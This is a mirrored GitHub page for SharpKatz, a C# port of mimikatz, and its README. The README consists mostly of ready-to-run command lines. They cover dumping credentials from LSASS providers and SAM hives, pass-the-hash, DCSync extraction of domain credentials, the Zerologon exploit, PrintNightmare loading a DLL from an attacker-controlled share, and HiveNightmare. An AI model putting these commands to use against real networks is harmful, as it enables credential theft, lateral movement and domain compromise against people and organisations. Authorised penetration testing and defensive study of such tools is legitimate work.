https://github.com/b4rtik/SharpKatz
Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
Last synced: about 2 months ago
- Host: GitHub
- URL: https://github.com/b4rtik/SharpKatz
- Owner: b4rtik
- Created: 2020-05-19T17:56:46.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2021-11-07T21:29:22.000Z (about 3 years ago)
- Last Synced: 2024-08-05T17:25:17.434Z (6 months ago)
- Language: C#
- Homepage:
- Size: 608 KB
- Stars: 950
- Watchers: 26
- Forks: 133
- Open Issues: 4
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - b4rtik/SharpKatz - Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands (C#)
README
# SharpKatz
Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
## Usage
### Ekeys
```SharpKatz.exe --Command ekeys```
List Kerberos encryption keys
### Msv
```SharpKatz.exe --Command msv```
Retrieve user credentials from the Msv provider
### Kerberos
```SharpKatz.exe --Command kerberos```
Retrieve user credentials from the Kerberos provider
### Tspkg
```SharpKatz.exe --Command tspkg```
Retrieve user credentials from the Tspkg provider
### Credman
```SharpKatz.exe --Command credman```
Retrieve user credentials from the Credman provider
### WDigest
```SharpKatz.exe --Command wdigest```
Retrieve user credentials from the WDigest provider
### Logonpasswords
```SharpKatz.exe --Command logonpasswords```
Retrieve user credentials from all providers
### List shadowcopies
```SharpKatz.exe --Command listshadows```
Enumerate shadow copies using NtOpenDirectoryObject and NtQueryDirectoryObject
### Lsadumpsam
```SharpKatz.exe --Command dumpsam --System \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM --Sam \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM```
Dump credentials from the provided SAM database (here read from a shadow copy, so the live hive lock does not apply)
### Pth
```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash```
Perform pass-the-hash to create a process under the userdomain\username credential using the NTLM hash of the user's password
```SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key```
Perform pass-the-hash to create a process under the userdomain\username credential using the user's RC4 key
```SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash```
Replace the NTLM hash for an existing logon session
```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256```
Perform pass-the-hash to create a process under the userdomain\username credential using the NTLM hash of the user's password and the AES256 key
### DCSync
```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc```
Dump a user's credentials by username
```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc```
Dump a user's credentials by GUID
```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc```
Export the entire dataset from AD to a file created in the current user's temp folder
```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```
Dump a user's credentials by username using alternative credentials
```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```
Dump a user's credentials by GUID using alternative credentials
```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```
Export the entire dataset from AD to a file created in the current user's temp folder using alternative credentials
### Zerologon
No reference to logoncli.dll; using the direct RPC call, it works even from a [non-domain joined workstation](https://twitter.com/gentilkiwi/status/1306178689630076929)
```SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```
Perform Zerologon check
```SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```
Perform Zerologon attack
```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local```
Perform Zerologon attack and dump user credential by username
```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local```
Perform Zerologon attack and dump user credential by GUID
```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local```
Perform Zerologon attack and export the entire dataset from AD to a file created in the current user's temp folder
Note: Do not use zerologon in a production environment, or at least plan for the recovery actions which are detailed [here](https://github.com/dirkjanm/CVE-2020-1472)
### PrintNightmare CVE-2021-1675 - CVE-2021-34527
```SharpKatz.exe --Command printnightmare --Target dc --Library \\mycontrolled\share\fun.dll```
Perform PrintNightmare attack
```SharpKatz.exe --Command printnightmare --Target dc --Library \\mycontrolled\share\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom```
Perform PrintNightmare attack with provided credentials
### HiveNightmare CVE-2021-36934
```SharpKatz.exe --Command hiveghtmare```
Exploit the HiveNightmare vulnerability, selecting the first available shadow copy
## Credits
This project depends entirely on the work of [Benjamin Delpy](https://twitter.com/gentilkiwi) and [Vincent Le Toux](https://twitter.com/mysmartlogon) on the [Mimikatz](https://github.com/gentilkiwi/mimikatz) and [MakeMeEnterpriseAdmin](https://raw.githubusercontent.com/vletoux/MakeMeEnterpriseAdmin/master/MakeMeEnterpriseAdmin.ps1) projects.
The analysis of the code was conducted following the example from [this blog post](https://blog.xpnsec.com/exploring-mimikatz-part-1/) by [xpn](https://twitter.com/_xpn_).